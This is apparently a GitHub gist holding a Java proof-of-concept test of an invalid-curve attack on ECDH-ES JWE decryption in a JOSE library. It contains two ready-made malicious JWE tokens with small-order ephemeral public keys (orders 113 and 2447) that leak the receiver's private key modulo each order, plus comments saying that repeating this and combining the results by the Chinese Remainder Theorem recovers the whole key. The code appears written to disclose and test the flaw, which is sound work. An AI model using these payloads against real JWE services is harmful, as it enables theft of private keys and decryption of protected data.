private static ECKey generateECJWK(final ECKey.Curve curve) | |
throws Exception { | |
final ECParameterSpec ecParameterSpec = curve.toECParameterSpec(); | |
KeyPairGenerator generator = KeyPairGenerator.getInstance("EC"); | |
generator.initialize(ecParameterSpec); | |
KeyPair keyPair = generator.generateKeyPair(); | |
final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate(); | |
ECPrivateKey pk = new ECPrivateKey() { | |
BigInteger bi = new BigInteger( | |
"38124166010662753100689735609285807169841714722622367731519061366402702420444"); | |
@Override | |
public ECParameterSpec getParams() { | |
return ecParameterSpec; | |
} | |
@Override | |
public String getFormat() { | |
return privateKey.getFormat(); | |
} | |
@Override | |
public byte[] getEncoded() { | |
return bi.toByteArray(); | |
} | |
@Override | |
public String getAlgorithm() { | |
return privateKey.getAlgorithm(); | |
} | |
@Override | |
public BigInteger getS() { | |
return bi; | |
} | |
}; | |
return new ECKey.Builder(curve, (ECPublicKey) keyPair.getPublic()) | |
.privateKey(pk).build(); | |
} | |
public void testCycle_ECDH_ES_Curve_P256() throws Exception { | |
ECKey ecJWK = generateECJWK(ECKey.Curve.P_256); | |
BigInteger privateReceiverKEy = ecJWK.toECPrivateKey().getS(); | |
JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.ECDH_ES, | |
EncryptionMethod.A128GCM) | |
.agreementPartyUInfo(Base64URL.encode("Alice")) | |
.agreementPartyVInfo(Base64URL.encode("Bob")).build(); | |
// ========================= attacking point #1 with order 113 | |
// ====================== | |
BigInteger attackerOrderGroup1 = new BigInteger("113"); | |
BigInteger receiverPrivateKeyModAttackerOrderGroup1 = privateReceiverKEy | |
.mod(attackerOrderGroup1); | |
System.out.println("The receiver private key is equal to " | |
+ receiverPrivateKeyModAttackerOrderGroup1 + " mod " | |
+ attackerOrderGroup1); | |
// The malicious JWE contains a public key with order 113 | |
String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w"; | |
JWEObject jweObject1 = JWEObject.parse(maliciousJWE1); | |
ECDHDecrypter decrypter = new ECDHDecrypter(ecJWK.toECPrivateKey()); | |
decrypter.getJCAContext().setContentEncryptionProvider( | |
BouncyCastleProviderSingleton.getInstance()); | |
jweObject1.decrypt(decrypter); | |
// this proof that receiverPrivateKey is equals 26 % 113 | |
assertEquals("Gambling is illegal at Bushwood sir, and I never slice.", | |
jweObject1.getPayload().toString()); | |
// ========================= attacking point #2 with order 2447 | |
// ====================== | |
BigInteger attackerOrderGroup2 = new BigInteger("2447"); | |
BigInteger receiverPrivateKeyModAttackerOrderGroup2 = privateReceiverKEy | |
.mod(attackerOrderGroup2); | |
System.out.println("The receiver private key is equal to " | |
+ receiverPrivateKeyModAttackerOrderGroup2 + " mod " | |
+ attackerOrderGroup2); | |
// The malicious JWE contains a public key with order 2447 | |
String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A"; | |
JWEObject jweObject2 = JWEObject.parse(maliciousJWE2); | |
decrypter.getJCAContext().setContentEncryptionProvider( | |
BouncyCastleProviderSingleton.getInstance()); | |
jweObject2.decrypt(decrypter); | |
// this proof that receiverPrivateKey is equals 2446 % 2447 | |
assertEquals("Gambling is illegal at Bushwood sir, and I never slice.", | |
jweObject2.getPayload().toString()); | |
// THIS CAN BE DOIN MANY TIME | |
// .... | |
// AND THAN CHINESE REMAINDER THEOREM FTW | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment